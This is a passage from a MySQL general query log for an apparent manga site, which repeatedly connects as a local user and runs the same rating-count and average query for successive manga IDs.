created desc 330646696 Quit 330646697 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646697 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330646697 Quit 330646698 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646698 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330646698 Quit 330646699 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646699 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330646699 Quit 330646700 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646700 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330646700 Quit 330646701 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646701 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330646701 Quit 330646702 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646702 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330646702 Quit 330646703 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646703 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330646703 Quit 330646704 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646704 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330646704 Quit 330646705 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646705 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330646705 Quit 330646706 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646706 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330646706 Quit 330646707 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646707 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330646707 Quit 330646708 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646708 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330646708 Quit 330646709 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646709 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330646709 Quit 330646710 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646710 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330646710 Quit 330646711 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646711 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330646711 Quit 330646712 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646712 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330646712 Quit 330646713 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646713 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330646713 Quit 330646714 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646714 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330646714 Quit 330646715 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646715 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330646715 Quit 330646716 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646716 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330646716 Quit 330646717 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646717 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330646717 Quit 330646718 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646718 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330646718 Quit 330646719 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646719 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330646719 Quit 330646720 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646720 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330646720 Quit 330646721 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646721 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330646721 Quit 330646722 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646722 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330646722 Quit 330646723 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646723 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330646723 Quit 330646724 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646724 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330646724 Quit 330646725 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646725 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330646725 Quit 330646726 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646726 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330646726 Quit 330646727 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646727 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330646727 Quit 330646728 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646728 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330646728 Quit 330646729 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646729 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330646729 Quit 330646730 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646730 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330646730 Quit 330646731 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646731 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330646731 Quit 330646732 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646732 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330646732 Quit 330646733 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646733 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330646733 Quit 330646734 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646734 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330646734 Quit 330646735 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646735 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330646735 Quit 330646736 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646736 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '349' order by created desc 330646736 Quit 330646737 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646737 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330646737 Quit 330646738 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646738 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330646738 Quit 330646739 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646739 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330646739 Quit 330646740 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646740 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330646740 Quit 330646741 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646741 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330646741 Quit 330646742 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646742 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330646742 Quit 330646743 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646743 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330646743 Quit 330646744 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646744 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330646744 Quit 330646745 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646745 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330646745 Quit 330646746 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646746 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330646746 Quit 330646747 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646747 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330646747 Quit 330646748 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646748 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330646748 Quit 330646749 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646749 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330646749 Quit 330646750 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646750 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330646750 Quit 330646751 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646751 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330646751 Quit 330646752 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646752 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330646752 Quit 330646753 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646753 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330646753 Quit 330646754 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646754 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330646754 Quit 330646755 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646755 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330646755 Quit 330646756 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646756 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330646756 Quit 330646757 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646757 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330646757 Quit 330646758 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646758 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330646758 Quit 330646759 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646759 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330646759 Quit 330646760 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646760 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330646760 Quit 330646761 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646761 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330646761 Quit 330646762 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646762 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330646762 Quit 330646763 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646763 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330646763 Quit 330646764 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646764 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330646764 Quit 330646765 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646765 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330646765 Quit 330646766 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646766 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330646766 Quit 330646767 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646767 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330646767 Quit 330646768 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646768 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330646768 Quit 330646769 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646769 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330646769 Quit 330646770 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646770 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330646770 Quit 330646771 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646771 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330646771 Quit 330646772 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646772 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330646772 Quit 330646773 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646773 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330646773 Quit 330646774 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646774 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330646774 Quit 330646775 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646775 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330646775 Quit 330646776 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646776 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330646776 Quit 330646777 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646777 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330646777 Quit 330646778 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646778 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330646778 Quit 330646779 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646779 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330646779 Quit 330646780 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646780 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330646780 Quit 330646781 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646781 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330646781 Quit 330646782 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646782 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330646782 Quit 330646783 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646783 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330646783 Quit 330646784 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646784 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330646784 Quit 330646785 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646785 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330646785 Quit 330646786 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646786 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330646786 Quit 330646787 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646787 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330646787 Quit 330646788 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646788 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330646788 Quit 330646789 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646789 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330646789 Quit 330646790 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646790 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330646790 Quit 330646791 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646791 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330646791 Quit 330646792 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646792 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330646792 Quit 330646793 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646793 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330646793 Quit 330646794 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646794 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330646794 Quit 330646795 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646795 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330646795 Quit 330646796 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646796 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330646796 Quit 330646797 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646797 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330646797 Quit 330646798 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646798 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330646798 Quit 330646799 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646799 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330646799 Quit 330646800 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646800 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330646800 Quit 330646801 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646801 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330646801 Quit 330646802 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646802 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330646802 Quit 330646803 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646803 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330646803 Quit 330646804 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646804 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330646804 Quit 330646805 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646805 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330646805 Quit 330646806 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646806 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330646806 Quit 330646807 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646807 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330646807 Quit 330646808 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646808 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330646808 Quit 330646809 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646809 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330646809 Quit 330646810 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646810 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330646810 Quit 330646811 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646811 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330646811 Quit 330646812 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646812 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330646812 Quit 330646813 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646813 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330646813 Quit 330646814 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646814 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330646814 Quit 330646815 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646815 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330646815 Quit 330646816 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646816 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330646816 Quit 330646817 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646817 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330646817 Quit 330646818 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646818 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330646818 Quit 330646819 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646819 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330646819 Quit 330646820 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646820 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330646820 Quit 330646821 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646821 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330646821 Quit 330646822 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646822 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330646822 Quit 330646823 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646823 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330646823 Quit 330646824 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646824 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330646824 Quit 330646825 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646825 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330646825 Quit 330646826 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646826 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330646826 Quit 330646827 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646827 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330646827 Quit 330646828 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646828 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330646828 Quit 330646829 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646829 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330646829 Quit 330646830 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646830 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330646830 Quit 330646831 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646831 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330646831 Quit 330646832 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646832 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330646832 Quit 330646833 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646833 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330646833 Quit 330646834 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646834 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330646834 Quit 330646835 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646835 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330646835 Quit 330646836 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646836 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330646836 Quit 330646837 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646837 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330646837 Quit 330646838 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646838 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330646838 Quit 330646839 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646839 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330646839 Quit 330646840 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646840 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330646840 Quit 330646841 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646841 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330646841 Quit 330646842 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646842 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330646842 Quit 330646843 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646843 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330646843 Quit 330646844 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646844 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330646844 Quit 330646845 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646845 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330646845 Quit 330646846 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646846 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330646846 Quit 330646847 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646847 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330646847 Quit 330646848 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646848 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330646848 Quit 330646849 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646849 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 